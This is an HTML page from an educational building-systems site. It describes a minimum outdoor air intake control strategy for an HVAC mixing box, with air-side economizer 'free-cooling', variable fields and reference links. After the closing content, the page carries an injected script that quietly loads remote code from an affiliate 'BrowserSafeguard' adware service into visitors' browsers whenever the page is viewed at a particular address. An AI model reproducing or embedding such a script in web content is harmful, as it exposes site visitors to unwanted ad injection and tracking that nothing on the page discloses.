﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>MINIMUM OUTDOOR AIR INTAKE CONTROL STRATEGY</h1>
<h3>Associated System: Mixing Box</h3>
<div class="graphic"> <img src="../HVAC AHU & Ducts/PistonGate.png" alt=""/ ></div>    
<p>An outdoor air intake strategy will adjust the amount of outdoor air that is allowed into the mixing box. If a building has air-side economizers, the amount of outdoor air will be adjusted by increasing or decreasing the dampers in order to take advantage of "Free-cooling" which occurs when the outdoor air is at an optimum temperature and can supply the required cooling without introducing any mechanical cooling in to the system. during periods when the outdoor is outside of a desireable range, the outdoor air dampers when return to the minimum setting.</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p></p>      
<h4>The value of this variable can be adjusted during a simulation run-time.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> MinDmprPos</li>
<li><label>Minimum:</label> </li>
<li><label>Maximum:</label> </li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> set of options</li>
<li><label>SI Units:</label> set of options</li>      </ul>
<h2>Related Items: </h2>
<ul></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://www.energystar.gov/index.cfm?c=power_mgt.datacenter_efficiency_economizer_airside" target="_blank">http://www.energystar.gov/index.cfm?c=power_mgt.datacenter_efficiency_economizer_airside</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
